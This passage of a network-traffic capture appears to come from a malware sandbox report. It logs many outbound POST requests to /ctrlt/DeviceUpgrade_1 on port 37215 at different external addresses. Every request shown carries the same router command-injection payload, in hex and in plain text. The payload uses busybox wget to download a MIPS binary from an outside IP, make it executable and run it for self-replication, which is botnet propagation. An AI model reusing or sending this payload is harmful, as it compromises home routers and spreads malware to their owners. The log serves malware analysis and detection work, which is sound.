                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2373192.168.2.1532904109.40.251.20537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.366987944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2374192.168.2.154469841.241.248.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.367049932 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2375192.168.2.1533534102.185.16.6037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.372565031 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2376192.168.2.1547770197.155.202.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.372622967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2377192.168.2.1539536119.82.105.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.372668982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2378192.168.2.1536898192.251.205.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.372482061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2379192.168.2.1549262197.37.160.11337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.372494936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2380192.168.2.155978841.76.8.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392369986 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2381192.168.2.1558786157.49.132.20637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392385006 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2382192.168.2.1538426157.70.223.5437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:31.392405033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
